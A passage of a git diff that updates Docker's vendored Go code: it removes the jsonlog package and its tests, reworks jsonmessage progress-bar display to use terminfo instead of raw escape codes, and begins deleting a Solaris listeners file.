-		&JSONLog{Log: `"A log line with \\"`}:           `^{\"log\":\"\\\"A log line with \\\\\\\\\\\"\",\"time\":\".{20,}\"}$`,
-		&JSONLog{Log: "A log line"}:                     `^{\"log\":\"A log line\",\"time\":\".{20,}\"}$`,
-		&JSONLog{Log: "A log line with \r"}:             `^{\"log\":\"A log line with \\r\",\"time\":\".{20,}\"}$`,
-		&JSONLog{Log: "A log line with & < >"}:          `^{\"log\":\"A log line with \\u0026 \\u003c \\u003e\",\"time\":\".{20,}\"}$`,
-		&JSONLog{Log: "A log line with utf8 : 🚀 ψ ω β"}: `^{\"log\":\"A log line with utf8 : 🚀 ψ ω β\",\"time\":\".{20,}\"}$`,
-		&JSONLog{Stream: "stdout"}:                      `^{\"stream\":\"stdout\",\"time\":\".{20,}\"}$`,
-		&JSONLog{}:                                      `^{\"time\":\".{20,}\"}$`,
-		// These ones are a little weird
-		&JSONLog{Log: "\u2028 \u2029"}:      `^{\"log\":\"\\u2028 \\u2029\",\"time\":\".{20,}\"}$`,
-		&JSONLog{Log: string([]byte{0xaF})}: `^{\"log\":\"\\ufffd\",\"time\":\".{20,}\"}$`,
-		&JSONLog{Log: string([]byte{0x7F})}: `^{\"log\":\"\x7f\",\"time\":\".{20,}\"}$`,
-	}
-	for jsonLog, expression := range logs {
-		data, err := jsonLog.MarshalJSON()
-		if err != nil {
-			t.Fatal(err)
-		}
-		res := string(data)
-		t.Logf("Result of WriteLog: %q", res)
-		logRe := regexp.MustCompile(expression)
-		if !logRe.MatchString(res) {
-			t.Fatalf("Log line not in expected format [%v]: %q", expression, res)
-		}
-	}
-}
diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes_test.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes_test.go
deleted file mode 100644
index 6d6ad21583..0000000000
--- a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes_test.go
+++ /dev/null
@@ -1,39 +0,0 @@
-package jsonlog
-
-import (
-	"bytes"
-	"regexp"
-	"testing"
-)
-
-func TestJSONLogsMarshalJSONBuf(t *testing.T) {
-	logs := map[*JSONLogs]string{
-		&JSONLogs{Log: []byte(`"A log line with \\"`)}:           `^{\"log\":\"\\\"A log line with \\\\\\\\\\\"\",\"time\":}$`,
-		&JSONLogs{Log: []byte("A log line")}:                     `^{\"log\":\"A log line\",\"time\":}$`,
-		&JSONLogs{Log: []byte("A log line with \r")}:             `^{\"log\":\"A log line with \\r\",\"time\":}$`,
-		&JSONLogs{Log: []byte("A log line with & < >")}:          `^{\"log\":\"A log line with \\u0026 \\u003c \\u003e\",\"time\":}$`,
-		&JSONLogs{Log: []byte("A log line with utf8 : 🚀 ψ ω β")}: `^{\"log\":\"A log line with utf8 : 🚀 ψ ω β\",\"time\":}$`,
-		&JSONLogs{Stream: "stdout"}:                              `^{\"stream\":\"stdout\",\"time\":}$`,
-		&JSONLogs{Stream: "stdout", Log: []byte("A log line")}:   `^{\"log\":\"A log line\",\"stream\":\"stdout\",\"time\":}$`,
-		&JSONLogs{Created: "time"}:                               `^{\"time\":time}$`,
-		&JSONLogs{}:                                              `^{\"time\":}$`,
-		// These ones are a little weird
-		&JSONLogs{Log: []byte("\u2028 \u2029")}: `^{\"log\":\"\\u2028 \\u2029\",\"time\":}$`,
-		&JSONLogs{Log: []byte{0xaF}}:            `^{\"log\":\"\\ufffd\",\"time\":}$`,
-		&JSONLogs{Log: []byte{0x7F}}:            `^{\"log\":\"\x7f\",\"time\":}$`,
-		// with raw attributes
-		&JSONLogs{Log: []byte("A log line"), RawAttrs: []byte(`{"hello":"world","value":1234}`)}: `^{\"log\":\"A log line\",\"attrs\":{\"hello\":\"world\",\"value\":1234},\"time\":}$`,
-	}
-	for jsonLog, expression := range logs {
-		var buf bytes.Buffer
-		if err := jsonLog.MarshalJSONBuf(&buf); err != nil {
-			t.Fatal(err)
-		}
-		res := buf.String()
-		t.Logf("Result of WriteLog: %q", res)
-		logRe := regexp.MustCompile(expression)
-		if !logRe.MatchString(res) {
-			t.Fatalf("Log line not in expected format [%v]: %q", expression, res)
-		}
-	}
-}
diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling.go b/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling.go
deleted file mode 100644
index 2117338149..0000000000
--- a/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling.go
+++ /dev/null
@@ -1,27 +0,0 @@
-// Package jsonlog provides helper functions to parse and print time (time.Time) as JSON.
-package jsonlog
-
-import (
-	"errors"
-	"time"
-)
-
-const (
-	// RFC3339NanoFixed is our own version of RFC339Nano because we want one
-	// that pads the nano seconds part with zeros to ensure
-	// the timestamps are aligned in the logs.
-	RFC3339NanoFixed = "2006-01-02T15:04:05.000000000Z07:00"
-	// JSONFormat is the format used by FastMarshalJSON
-	JSONFormat = `"` + time.RFC3339Nano + `"`
-)
-
-// FastTimeMarshalJSON avoids one of the extra allocations that
-// time.MarshalJSON is making.
-func FastTimeMarshalJSON(t time.Time) (string, error) {
-	if y := t.Year(); y < 0 || y >= 10000 {
-		// RFC 3339 is clear that years are 4 digits exactly.
-		// See golang.org/issue/4556#c15 for more discussion.
-		return "", errors.New("time.MarshalJSON: year outside of range [0,9999]")
-	}
-	return t.Format(JSONFormat), nil
-}
diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling_test.go b/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling_test.go
deleted file mode 100644
index 02d0302c4a..0000000000
--- a/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling_test.go
+++ /dev/null
@@ -1,47 +0,0 @@
-package jsonlog
-
-import (
-	"testing"
-	"time"
-)
-
-// Testing to ensure 'year' fields is between 0 and 9999
-func TestFastTimeMarshalJSONWithInvalidDate(t *testing.T) {
-	aTime := time.Date(-1, 1, 1, 0, 0, 0, 0, time.Local)
-	json, err := FastTimeMarshalJSON(aTime)
-	if err == nil {
-		t.Fatalf("FastTimeMarshalJSON should throw an error, but was '%v'", json)
-	}
-	anotherTime := time.Date(10000, 1, 1, 0, 0, 0, 0, time.Local)
-	json, err = FastTimeMarshalJSON(anotherTime)
-	if err == nil {
-		t.Fatalf("FastTimeMarshalJSON should throw an error, but was '%v'", json)
-	}
-
-}
-
-func TestFastTimeMarshalJSON(t *testing.T) {
-	aTime := time.Date(2015, 5, 29, 11, 1, 2, 3, time.UTC)
-	json, err := FastTimeMarshalJSON(aTime)
-	if err != nil {
-		t.Fatal(err)
-	}
-	expected := "\"2015-05-29T11:01:02.000000003Z\""
-	if json != expected {
-		t.Fatalf("Expected %v, got %v", expected, json)
-	}
-
-	location, err := time.LoadLocation("Europe/Paris")
-	if err != nil {
-		t.Fatal(err)
-	}
-	aTime = time.Date(2015, 5, 29, 11, 1, 2, 3, location)
-	json, err = FastTimeMarshalJSON(aTime)
-	if err != nil {
-		t.Fatal(err)
-	}
-	expected = "\"2015-05-29T11:01:02.000000003+02:00\""
-	if json != expected {
-		t.Fatalf("Expected %v, got %v", expected, json)
-	}
-}
diff --git a/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage.go b/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage.go
index 5481433c56..dd95f36704 100644
--- a/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage.go
+++ b/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage.go
@@ -1,17 +1,22 @@
-package jsonmessage
+package jsonmessage // import "github.com/docker/docker/pkg/jsonmessage"
 
 import (
 	"encoding/json"
 	"fmt"
 	"io"
+	"os"
 	"strings"
 	"time"
 
-	"github.com/docker/docker/pkg/jsonlog"
+	"github.com/Nvveen/Gotty"
 	"github.com/docker/docker/pkg/term"
 	"github.com/docker/go-units"
 )
 
+// RFC3339NanoFixed is time.RFC3339Nano with nanoseconds padded using zeros to
+// ensure the formatted time isalways the same number of characters.
+const RFC3339NanoFixed = "2006-01-02T15:04:05.000000000Z07:00"
+
 // JSONError wraps a concrete Code and Message, `Code` is
 // is an integer error code, `Message` is the error message.
 type JSONError struct {
@@ -32,29 +37,33 @@ type JSONProgress struct {
 	Current    int64 `json:"current,omitempty"`
 	Total      int64 `json:"total,omitempty"`
 	Start      int64 `json:"start,omitempty"`
+	// If true, don't show xB/yB
+	HideCounts bool   `json:"hidecounts,omitempty"`
+	Units      string `json:"units,omitempty"`
+	nowFunc    func() time.Time
+	winSize    int
 }
 
 func (p *JSONProgress) String() string {
 	var (
-		width       = 200
+		width       = p.width()
 		pbBox       string
 		numbersBox  string
 		timeLeftBox string
 	)
-
-	ws, err := term.GetWinsize(p.terminalFd)
-	if err == nil {
-		width = int(ws.Width)
-	}
-
 	if p.Current <= 0 && p.Total <= 0 {
 		return ""
 	}
-	current := units.HumanSize(float64(p.Current))
 	if p.Total <= 0 {
-		return fmt.Sprintf("%8v", current)
+		switch p.Units {
+		case "":
+			current := units.HumanSize(float64(p.Current))
+			return fmt.Sprintf("%8v", current)
+		default:
+			return fmt.Sprintf("%d %s", p.Current, p.Units)
+		}
 	}
-	total := units.HumanSize(float64(p.Total))
+
 	percentage := int(float64(p.Current)/float64(p.Total)*100) / 2
 	if percentage > 50 {
 		percentage = 50
@@ -68,15 +77,29 @@ func (p *JSONProgress) String() string {
 		pbBox = fmt.Sprintf("[%s>%s] ", strings.Repeat("=", percentage), strings.Repeat(" ", numSpaces))
 	}
 
-	numbersBox = fmt.Sprintf("%8v/%v", current, total)
+	switch {
+	case p.HideCounts:
+	case p.Units == "": // no units, use bytes
+		current := units.HumanSize(float64(p.Current))
+		total := units.HumanSize(float64(p.Total))
+
+		numbersBox = fmt.Sprintf("%8v/%v", current, total)
+
+		if p.Current > p.Total {
+			// remove total display if the reported current is wonky.
+			numbersBox = fmt.Sprintf("%8v", current)
+		}
+	default:
+		numbersBox = fmt.Sprintf("%d/%d %s", p.Current, p.Total, p.Units)
 
-	if p.Current > p.Total {
-		// remove total display if the reported current is wonky.
-		numbersBox = fmt.Sprintf("%8v", current)
+		if p.Current > p.Total {
+			// remove total display if the reported current is wonky.
+			numbersBox = fmt.Sprintf("%d %s", p.Current, p.Units)
+		}
 	}
 
 	if p.Current > 0 && p.Start > 0 && percentage < 50 {
-		fromStart := time.Now().UTC().Sub(time.Unix(p.Start, 0))
+		fromStart := p.now().Sub(time.Unix(p.Start, 0))
 		perEntry := fromStart / time.Duration(p.Current)
 		left := time.Duration(p.Total-p.Current) * perEntry
 		left = (left / time.Second) * time.Second
@@ -88,6 +111,28 @@ func (p *JSONProgress) String() string {
 	return pbBox + numbersBox + timeLeftBox
 }
 
+// shim for testing
+func (p *JSONProgress) now() time.Time {
+	if p.nowFunc == nil {
+		p.nowFunc = func() time.Time {
+			return time.Now().UTC()
+		}
+	}
+	return p.nowFunc()
+}
+
+// shim for testing
+func (p *JSONProgress) width() int {
+	if p.winSize != 0 {
+		return p.winSize
+	}
+	ws, err := term.GetWinsize(p.terminalFd)
+	if err == nil {
+		return int(ws.Width)
+	}
+	return 200
+}
+
 // JSONMessage defines a message struct. It describes
 // the created time, where it from, status, ID of the
 // message. It's used for docker events.
@@ -102,32 +147,82 @@ type JSONMessage struct {
 	TimeNano        int64         `json:"timeNano,omitempty"`
 	Error           *JSONError    `json:"errorDetail,omitempty"`
 	ErrorMessage    string        `json:"error,omitempty"` //deprecated
-	// Aux contains out-of-band data, such as digests for push signing.
+	// Aux contains out-of-band data, such as digests for push signing and image id after building.
 	Aux *json.RawMessage `json:"aux,omitempty"`
 }
 
-// Display displays the JSONMessage to `out`. `isTerminal` describes if `out`
+/* Satisfied by gotty.TermInfo as well as noTermInfo from below */
+type termInfo interface {
+	Parse(attr string, params ...interface{}) (string, error)
+}
+
+type noTermInfo struct{} // canary used when no terminfo.
+
+func (ti *noTermInfo) Parse(attr string, params ...interface{}) (string, error) {
+	return "", fmt.Errorf("noTermInfo")
+}
+
+func clearLine(out io.Writer, ti termInfo) {
+	// el2 (clear whole line) is not exposed by terminfo.
+
+	// First clear line from beginning to cursor
+	if attr, err := ti.Parse("el1"); err == nil {
+		fmt.Fprintf(out, "%s", attr)
+	} else {
+		fmt.Fprintf(out, "\x1b[1K")
+	}
+	// Then clear line from cursor to end
+	if attr, err := ti.Parse("el"); err == nil {
+		fmt.Fprintf(out, "%s", attr)
+	} else {
+		fmt.Fprintf(out, "\x1b[K")
+	}
+}
+
+func cursorUp(out io.Writer, ti termInfo, l int) {
+	if l == 0 { // Should never be the case, but be tolerant
+		return
+	}
+	if attr, err := ti.Parse("cuu", l); err == nil {
+		fmt.Fprintf(out, "%s", attr)
+	} else {
+		fmt.Fprintf(out, "\x1b[%dA", l)
+	}
+}
+
+func cursorDown(out io.Writer, ti termInfo, l int) {
+	if l == 0 { // Should never be the case, but be tolerant
+		return
+	}
+	if attr, err := ti.Parse("cud", l); err == nil {
+		fmt.Fprintf(out, "%s", attr)
+	} else {
+		fmt.Fprintf(out, "\x1b[%dB", l)
+	}
+}
+
+// Display displays the JSONMessage to `out`. `termInfo` is non-nil if `out`
 // is a terminal. If this is the case, it will erase the entire current line
 // when displaying the progressbar.
-func (jm *JSONMessage) Display(out io.Writer, isTerminal bool) error {
+func (jm *JSONMessage) Display(out io.Writer, termInfo termInfo) error {
 	if jm.Error != nil {
 		if jm.Error.Code == 401 {
-			return fmt.Errorf("Authentication is required.")
+			return fmt.Errorf("authentication is required")
 		}
 		return jm.Error
 	}
 	var endl string
-	if isTerminal && jm.Stream == "" && jm.Progress != nil {
-		// <ESC>[2K = erase entire current line
-		fmt.Fprintf(out, "%c[2K\r", 27)
+	if termInfo != nil && jm.Stream == "" && jm.Progress != nil {
+		clearLine(out, termInfo)
 		endl = "\r"
+		fmt.Fprintf(out, endl)
 	} else if jm.Progress != nil && jm.Progress.String() != "" { //disable progressbar in non-terminal
 		return nil
 	}
 	if jm.TimeNano != 0 {
-		fmt.Fprintf(out, "%s ", time.Unix(0, jm.TimeNano).Format(jsonlog.RFC3339NanoFixed))
+		fmt.Fprintf(out, "%s ", time.Unix(0, jm.TimeNano).Format(RFC3339NanoFixed))
 	} else if jm.Time != 0 {
-		fmt.Fprintf(out, "%s ", time.Unix(jm.Time, 0).Format(jsonlog.RFC3339NanoFixed))
+		fmt.Fprintf(out, "%s ", time.Unix(jm.Time, 0).Format(RFC3339NanoFixed))
 	}
 	if jm.ID != "" {
 		fmt.Fprintf(out, "%s: ", jm.ID)
@@ -135,7 +230,7 @@ func (jm *JSONMessage) Display(out io.Writer, isTerminal bool) error {
 	if jm.From != "" {
 		fmt.Fprintf(out, "(from %s) ", jm.From)
 	}
-	if jm.Progress != nil && isTerminal {
+	if jm.Progress != nil && termInfo != nil {
 		fmt.Fprintf(out, "%s %s%s", jm.Status, jm.Progress.String(), endl)
 	} else if jm.ProgressMessage != "" { //deprecated
 		fmt.Fprintf(out, "%s %s%s", jm.Status, jm.ProgressMessage, endl)
@@ -150,11 +245,26 @@ func (jm *JSONMessage) Display(out io.Writer, isTerminal bool) error {
 // DisplayJSONMessagesStream displays a json message stream from `in` to `out`, `isTerminal`
 // describes if `out` is a terminal. If this is the case, it will print `\n` at the end of
 // each line and move the cursor while displaying.
-func DisplayJSONMessagesStream(in io.Reader, out io.Writer, terminalFd uintptr, isTerminal bool, auxCallback func(*json.RawMessage)) error {
+func DisplayJSONMessagesStream(in io.Reader, out io.Writer, terminalFd uintptr, isTerminal bool, auxCallback func(JSONMessage)) error {
 	var (
 		dec = json.NewDecoder(in)
 		ids = make(map[string]int)
 	)
+
+	var termInfo termInfo
+
+	if isTerminal {
+		term := os.Getenv("TERM")
+		if term == "" {
+			term = "vt102"
+		}
+
+		var err error
+		if termInfo, err = gotty.OpenTermInfo(term); err != nil {
+			termInfo = &noTermInfo{}
+		}
+	}
+
 	for {
 		diff := 0
 		var jm JSONMessage
@@ -167,7 +277,7 @@ func DisplayJSONMessagesStream(in io.Reader, out io.Writer, terminalFd uintptr,
 
 		if jm.Aux != nil {
 			if auxCallback != nil {
-				auxCallback(jm.Aux)
+				auxCallback(jm)
 			}
 			continue
 		}
@@ -186,13 +296,13 @@ func DisplayJSONMessagesStream(in io.Reader, out io.Writer, terminalFd uintptr,
 				// with no ID.
 				line = len(ids)
 				ids[jm.ID] = line
-				if isTerminal {
+				if termInfo != nil {
 					fmt.Fprintf(out, "\n")
 				}
 			}
 			diff = len(ids) - line
-			if isTerminal && diff > 0 {
-				fmt.Fprintf(out, "%c[%dA", 27, diff)
+			if termInfo != nil {
+				cursorUp(out, termInfo, diff)
 			}
 		} else {
 			// When outputting something that isn't progress
@@ -202,9 +312,9 @@ func DisplayJSONMessagesStream(in io.Reader, out io.Writer, terminalFd uintptr,
 			// with multiple tags).
 			ids = make(map[string]int)
 		}
-		err := jm.Display(out, isTerminal)
-		if jm.ID != "" && isTerminal && diff > 0 {
-			fmt.Fprintf(out, "%c[%dB", 27, diff)
+		err := jm.Display(out, termInfo)
+		if jm.ID != "" && termInfo != nil {
+			cursorDown(out, termInfo, diff)
 		}
 		if err != nil {
 			return err
@@ -220,6 +330,6 @@ type stream interface {
 }
 
 // DisplayJSONMessagesToStream prints json messages to the output stream
-func DisplayJSONMessagesToStream(in io.Reader, stream stream, auxCallback func(*json.RawMessage)) error {
+func DisplayJSONMessagesToStream(in io.Reader, stream stream, auxCallback func(JSONMessage)) error {
 	return DisplayJSONMessagesStream(in, stream, stream.FD(), stream.IsTerminal(), auxCallback)
 }
diff --git a/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage_test.go b/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage_test.go
index c6c5b0ed2a..223d9c7f5a 100644
--- a/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage_test.go
+++ b/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage_test.go
@@ -1,68 +1,116 @@
-package jsonmessage
+package jsonmessage // import "github.com/docker/docker/pkg/jsonmessage"
 
 import (
 	"bytes"
 	"fmt"
+	"os"
 	"strings"
 	"testing"
 	"time"
 
-	"github.com/docker/docker/pkg/jsonlog"
 	"github.com/docker/docker/pkg/term"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 func TestError(t *testing.T) {
 	je := JSONError{404, "Not found"}
-	if je.Error() != "Not found" {
-		t.Fatalf("Expected 'Not found' got '%s'", je.Error())
-	}
+	assert.Assert(t, is.Error(&je, "Not found"))
 }
 
-func TestProgress(t *testing.T) {
-	termsz, err := term.GetWinsize(0)
-	if err != nil {
-		// we can safely ignore the err here
-		termsz = nil
-	}
-	jp := JSONProgress{}
-	if jp.String() != "" {
-		t.Fatalf("Expected empty string, got '%s'", jp.String())
+func TestProgressString(t *testing.T) {
+	type expected struct {
+		short string
+		long  string
 	}
 
-	expected := "     1 B"
-	jp2 := JSONProgress{Current: 1}
-	if jp2.String() != expected {
-		t.Fatalf("Expected %q, got %q", expected, jp2.String())
+	shortAndLong := func(short, long string) expected {
+		return expected{short: short, long: long}
 	}
 
-	expectedStart := "[==========>                                        ]     20 B/100 B"
-	if termsz != nil && termsz.Width <= 110 {
-		expectedStart = "    20 B/100 B"
-	}
-	jp3 := JSONProgress{Current: 20, Total: 100, Start: time.Now().Unix()}
-	// Just look at the start of the string
-	// (the remaining time is really hard to test -_-)
-	if jp3.String()[:len(expectedStart)] != expectedStart {
-		t.Fatalf("Expected to start with %q, got %q", expectedStart, jp3.String())
+	start := time.Date(2017, 12, 3, 15, 10, 1, 0, time.UTC)
+	timeAfter := func(delta time.Duration) func() time.Time {
+		return func() time.Time {
+			return start.Add(delta)
+		}
 	}
 
-	expected = "[=========================>                         ]     50 B/100 B"
-	if termsz != nil && termsz.Width <= 110 {
-		expected = "    50 B/100 B"
-	}
-	jp4 := JSONProgress{Current: 50, Total: 100}
-	if jp4.String() != expected {
-		t.Fatalf("Expected %q, got %q", expected, jp4.String())
+	var testcases = []struct {
+		name     string
+		progress JSONProgress
+		expected expected
+	}{
+		{
+			name: "no progress",
+		},
+		{
+			name:     "progress 1",
+			progress: JSONProgress{Current: 1},
+			expected: shortAndLong("      1B", "      1B"),
+		},
+		{
+			name: "some progress with a start time",
+			progress: JSONProgress{
+				Current: 20,
+				Total:   100,
+				Start:   start.Unix(),
+				nowFunc: timeAfter(time.Second),
+			},
+			expected: shortAndLong(
+				"     20B/100B 4s",
+				"[==========>                                        ]      20B/100B 4s",
+			),
+		},
+		{
+			name:     "some progress without a start time",
+			progress: JSONProgress{Current: 50, Total: 100},
+			expected: shortAndLong(
+				"     50B/100B",
+				"[=========================>                         ]      50B/100B",
+			),
+		},
+		{
+			name:     "current more than total is not negative gh#7136",
+			progress: JSONProgress{Current: 50, Total: 40},
+			expected: shortAndLong(
+				"     50B",
+				"[==================================================>]      50B",
+			),
+		},
+		{
+			name:     "with units",
+			progress: JSONProgress{Current: 50, Total: 100, Units: "units"},
+			expected: shortAndLong(
+				"50/100 units",
+				"[=========================>                         ] 50/100 units",
+			),
+		},
+		{
+			name:     "current more than total with units is not negative ",
+			progress: JSONProgress{Current: 50, Total: 40, Units: "units"},
+			expected: shortAndLong(
+				"50 units",
+				"[==================================================>] 50 units",
+			),
+		},
+		{
+			name:     "hide counts",
+			progress: JSONProgress{Current: 50, Total: 100, HideCounts: true},
+			expected: shortAndLong(
+				"",
+				"[=========================>                         ] ",
+			),
+		},
 	}
 
-	// this number can't be negative gh#7136
-	expected = "[==================================================>]     50 B"
-	if termsz != nil && termsz.Width <= 110 {
-		expected = "    50 B"
-	}
-	jp5 := JSONProgress{Current: 50, Total: 40}
-	if jp5.String() != expected {
-		t.Fatalf("Expected %q, got %q", expected, jp5.String())
+	for _, testcase := range testcases {
+		t.Run(testcase.name, func(t *testing.T) {
+			testcase.progress.winSize = 100
+			assert.Equal(t, testcase.progress.String(), testcase.expected.short)
+
+			testcase.progress.winSize = 200
+			assert.Equal(t, testcase.progress.String(), testcase.expected.long)
+		})
 	}
 }
 
@@ -70,47 +118,47 @@ func TestJSONMessageDisplay(t *testing.T) {
 	now := time.Now()
 	messages := map[JSONMessage][]string{
 		// Empty
-		JSONMessage{}: {"\n", "\n"},
+		{}: {"\n", "\n"},
 		// Status
-		JSONMessage{
+		{
 			Status: "status",
 		}: {
 			"status\n",
 			"status\n",
 		},
 		// General
-		JSONMessage{
+		{
 			Time:   now.Unix(),
 			ID:     "ID",
 			From:   "From",
 			Status: "status",
 		}: {
-			fmt.Sprintf("%v ID: (from From) status\n", time.Unix(now.Unix(), 0).Format(jsonlog.RFC3339NanoFixed)),
-			fmt.Sprintf("%v ID: (from From) status\n", time.Unix(now.Unix(), 0).Format(jsonlog.RFC3339NanoFixed)),
+			fmt.Sprintf("%v ID: (from From) status\n", time.Unix(now.Unix(), 0).Format(RFC3339NanoFixed)),
+			fmt.Sprintf("%v ID: (from From) status\n", time.Unix(now.Unix(), 0).Format(RFC3339NanoFixed)),
 		},
 		// General, with nano precision time
-		JSONMessage{
+		{
 			TimeNano: now.UnixNano(),
 			ID:       "ID",
 			From:     "From",
 			Status:   "status",
 		}: {
-			fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(jsonlog.RFC3339NanoFixed)),
-			fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(jsonlog.RFC3339NanoFixed)),
+			fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(RFC3339NanoFixed)),
+			fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(RFC3339NanoFixed)),
 		},
 		// General, with both times Nano is preferred
-		JSONMessage{
+		{
 			Time:     now.Unix(),
 			TimeNano: now.UnixNano(),
 			ID:       "ID",
 			From:     "From",
 			Status:   "status",
 		}: {
-			fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(jsonlog.RFC3339NanoFixed)),
-			fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(jsonlog.RFC3339NanoFixed)),
+			fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(RFC3339NanoFixed)),
+			fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(RFC3339NanoFixed)),
 		},
 		// Stream over status
-		JSONMessage{
+		{
 			Status: "status",
 			Stream: "stream",
 		}: {
@@ -118,7 +166,7 @@ func TestJSONMessageDisplay(t *testing.T) {
 			"stream",
 		},
 		// With progress message
-		JSONMessage{
+		{
 			Status:          "status",
 			ProgressMessage: "progressMessage",
 		}: {
@@ -126,13 +174,13 @@ func TestJSONMessageDisplay(t *testing.T) {
 			"status progressMessage",
 		},
 		// With progress, stream empty
-		JSONMessage{
+		{
 			Status:   "status",
 			Stream:   "",
 			Progress: &JSONProgress{Current: 1},
 		}: {
 			"",
-			fmt.Sprintf("%c[2K\rstatus      1 B\r", 27),
+			fmt.Sprintf("%c[1K%c[K\rstatus       1B\r", 27, 27),
 		},
 	}
 
@@ -140,19 +188,19 @@ func TestJSONMessageDisplay(t *testing.T) {
 	for jsonMessage, expectedMessages := range messages {
 		// Without terminal
 		data := bytes.NewBuffer([]byte{})
-		if err := jsonMessage.Display(data, false); err != nil {
+		if err := jsonMessage.Display(data, nil); err != nil {
 			t.Fatal(err)
 		}
 		if data.String() != expectedMessages[0] {
-			t.Fatalf("Expected [%v], got [%v]", expectedMessages[0], data.String())
+			t.Fatalf("Expected %q,got %q", expectedMessages[0], data.String())
 		}
 		// With terminal
 		data = bytes.NewBuffer([]byte{})
-		if err := jsonMessage.Display(data, true); err != nil {
+		if err := jsonMessage.Display(data, &noTermInfo{}); err != nil {
 			t.Fatal(err)
 		}
 		if data.String() != expectedMessages[1] {
-			t.Fatalf("Expected [%v], got [%v]", expectedMessages[1], data.String())
+			t.Fatalf("\nExpected %q\n     got %q", expectedMessages[1], data.String())
 		}
 	}
 }
@@ -162,16 +210,14 @@ func TestJSONMessageDisplayWithJSONError(t *testing.T) {
 	data := bytes.NewBuffer([]byte{})
 	jsonMessage := JSONMessage{Error: &JSONError{404, "Can't find it"}}
 
-	err := jsonMessage.Display(data, true)
+	err := jsonMessage.Display(data, &noTermInfo{})
 	if err == nil || err.Error() != "Can't find it" {
-		t.Fatalf("Expected a JSONError 404, got [%v]", err)
+		t.Fatalf("Expected a JSONError 404, got %q", err)
 	}
 
 	jsonMessage = JSONMessage{Error: &JSONError{401, "Anything"}}
-	err = jsonMessage.Display(data, true)
-	if err == nil || err.Error() != "Authentication is required." {
-		t.Fatalf("Expected an error [Authentication is required.], got [%v]", err)
-	}
+	err = jsonMessage.Display(data, &noTermInfo{})
+	assert.Check(t, is.Error(err, "authentication is required"))
 }
 
 func TestDisplayJSONMessagesStreamInvalidJSON(t *testing.T) {
@@ -183,7 +229,7 @@ func TestDisplayJSONMessagesStreamInvalidJSON(t *testing.T) {
 	inFd, _ = term.GetFdInfo(reader)
 
 	if err := DisplayJSONMessagesStream(reader, data, inFd, false, nil); err == nil && err.Error()[:17] != "invalid character" {
-		t.Fatalf("Should have thrown an error (invalid character in ..), got [%v]", err)
+		t.Fatalf("Should have thrown an error (invalid character in ..), got %q", err)
 	}
 }
 
@@ -215,9 +261,15 @@ func TestDisplayJSONMessagesStream(t *testing.T) {
 		// With progressDetail
 		"{ \"id\": \"ID\", \"status\": \"status\", \"progressDetail\": { \"Current\": 1} }": {
 			"", // progressbar is disabled in non-terminal
-			fmt.Sprintf("\n%c[%dA%c[2K\rID: status      1 B\r%c[%dB", 27, 1, 27, 27, 1),
+			fmt.Sprintf("\n%c[%dA%c[1K%c[K\rID: status       1B\r%c[%dB", 27, 1, 27, 27, 27, 1),
 		},
 	}
+
+	// Use $TERM which is unlikely to exist, forcing DisplayJSONMessageStream to
+	// (hopefully) use &noTermInfo.
+	origTerm := os.Getenv("TERM")
+	os.Setenv("TERM", "xyzzy-non-existent-terminfo")
+
 	for jsonMessage, expectedMessages := range messages {
 		data := bytes.NewBuffer([]byte{})
 		reader := strings.NewReader(jsonMessage)
@@ -228,7 +280,7 @@ func TestDisplayJSONMessagesStream(t *testing.T) {
 			t.Fatal(err)
 		}
 		if data.String() != expectedMessages[0] {
-			t.Fatalf("Expected an [%v], got [%v]", expectedMessages[0], data.String())
+			t.Fatalf("Expected an %q, got %q", expectedMessages[0], data.String())
 		}
 
 		// With terminal
@@ -238,8 +290,9 @@ func TestDisplayJSONMessagesStream(t *testing.T) {
 			t.Fatal(err)
 		}
 		if data.String() != expectedMessages[1] {
-			t.Fatalf("Expected an [%v], got [%v]", expectedMessages[1], data.String())
+			t.Fatalf("\nExpected %q\n     got %q", expectedMessages[1], data.String())
 		}
 	}
+	os.Setenv("TERM", origTerm)
 
 }
diff --git a/vendor/github.com/docker/docker/pkg/listeners/listeners_solaris.go b/vendor/github.com/docker/docker/pkg/listeners/listeners_solaris.go
deleted file mode 100644
index ff833e3741..0000000000
--- a/vendor/github.com/docker/docker/pkg/listeners/listeners_solaris.go
+++ /dev/null
@@ -1,31 +0,0 @@
-package listeners
-
-import (
-	"crypto/tls"
-	"fmt"
-	"net"
-
-	"github.com/docker/go-connections/sockets"
-)
-
-// Init creates new listeners for the server.
-func Init(proto, addr, socketGroup string, tlsConfig *tls.Config) (ls []net.Listener, err error) {
-	switch proto {
-	case "tcp":
-		l, err := sockets.NewTCPSocket(addr, tlsConfig)
-		if err != nil {
-			return nil, err
-		}
-		ls = append(ls, l)
-	case "unix":
-		l, err := sockets.NewUnixSocket(addr, socketGroup)
-		if err != nil {
-			return nil, fmt.Errorf("can't create unix socket %s: %v", addr, err)
-		}
-		ls = append(ls, l)
-	default:
-		return nil, fmt.Errorf("Invalid protocol format: %q", proto)
-	}
-
